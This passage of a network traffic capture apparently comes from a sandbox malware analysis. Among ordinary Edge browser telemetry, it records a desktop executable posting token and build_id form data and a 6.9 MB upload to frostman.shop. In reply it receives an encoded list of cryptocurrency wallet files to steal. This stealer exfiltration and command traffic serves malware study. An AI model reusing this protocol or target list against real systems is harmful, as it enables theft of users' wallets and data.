2024-12-20 06:31:44 UTC | 16355 | OUT | Data Ascii: ------5PZCTRI58YM7QQ1N7GVKContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------5PZCTRI58YM7QQ1N7GVKContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------5PZCTRI58YM7QQ1N7GVKCont
2024-12-20 06:31:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 49911 | 23.209.72.43 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:46 UTC | 751 | OUT | GET /statics/icons/favicon_newtabpage.png HTTP/1.1
Host: assets.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
2024-12-20 06:31:46 UTC | 1002 | IN | HTTP/1.1 200 OK
Content-Type: image/png
ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
Server: AkamaiNetStorage
Date: Fri, 20 Dec 2024 06:31:46 GMT
Content-Length: 354
Connection: close
Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                Akamai-Request-BC: [a=23.210.4.149,b=893334880,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                Akamai-Server-IP: 23.210.4.149
                                                                                                                                                                                                                                                                                                Akamai-Request-ID: 353f3560
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Akamai-GRN: 0.9504d217.1734676306.353f3560
                                                                                                                                                                                                                                                                                                Vary: Origin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 49938 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:47 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2D2DBAS0ZU3E37GD268Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:47 UTC | 16355 | OUT | Data Ascii:
------2D2DBAS0ZU3E37GD268Q
Content-Disposition: form-data; name="token"

889f5f40738c5dc3f18f9676ef06948f
------2D2DBAS0ZU3E37GD268Q
Content-Disposition: form-data; name="build_id"

d3e426b319e78f89e66d1acb7676d093
------2D2DBAS0ZU3E37GD268Q
Cont
2024-12-20 06:31:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:48 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 49909 | 20.110.205.119 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:48 UTC | 1175 | OUT | GET /c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D7BFD8CBD1834510B8B7DB118C7D5586&RedC=c.msn.com&MXFR=015EFEE8056263FB2030EBB304006296
                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MUID=015EFEE8056263FB2030EBB304006296; domain=.msn.com; expires=Wed, 14-Jan-2026 06:31:48 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:48 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 49915 | 108.139.47.92 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:48 UTC | 925 | OUT | GET /b?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8

2024-12-20 06:31:48 UTC | 955 | IN | HTTP/1.1 302 Found
Content-Length: 0
Connection: close
Date: Fri, 20 Dec 2024 06:31:48 GMT
Location: /b2?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
set-cookie: UID=1921a3731edec7d894bcea01734676308; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
set-cookie: XID=1921a3731edec7d894bcea01734676308; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 ed4584f7c263c11cf4adf75ba3a25764.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK50-P1
X-Amz-Cf-Id: WUunni8w9JXHn2g7uEfKmNfOCePrLRAuI8VMZOXhu0Xj1n2SEud1Og==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 49944 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:48 UTC | 329 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----F3OHLFUK6F3E3ECTRI5F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache

2024-12-20 06:31:48 UTC | 16355 | OUT | Data Ascii: ------F3OHLFUK6F3E3ECTRI5FContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------F3OHLFUK6F3E3ECTRI5FContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------F3OHLFUK6F3E3ECTRI5FCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                                51192.168.2.649953108.139.47.924432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC1012OUTGET /b2?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: UID=1921a3731edec7d894bcea01734676308; XID=1921a3731edec7d894bcea01734676308
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 fa2a1404411f25eb7c3c4def0c2864e6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: S02CVsFXnnPoNr9o0PRvXXzjLXDP6TmWoLBYi39jUFovotLhM3aAQg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                                52192.168.2.649959116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L68GDJMO89RIM7GLNOZ5
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 4a 4d 4f 38 39 52 49 4d 37 47 4c 4e 4f 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 4a 4d 4f 38 39 52 49 4d 37 47 4c 4e 4f 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 4a 4d 4f 38 39 52 49 4d 37 47 4c 4e 4f 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------L68GDJMO89RIM7GLNOZ5Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------L68GDJMO89RIM7GLNOZ5Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------L68GDJMO89RIM7GLNOZ5Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                                53192.168.2.64995152.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676307692&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 3821
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
2024-12-20 06:31:50 UTC | 3821 | OUT
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-20T06:31:47.688Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
2024-12-20 06:31:50 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=58d265ec1c564a6db2221916674de664&HASH=58d2&LV=202412&V=4&LU=1734676310511; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=86037c92766a4dc29982f393a4f0d85d; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2819
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 49961 | 20.110.205.119 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:50 UTC | 1261 | OUT | GET /c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D7BFD8CBD1834510B8B7DB118C7D5586&MUID=015EFEE8056263FB2030EBB304006296 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
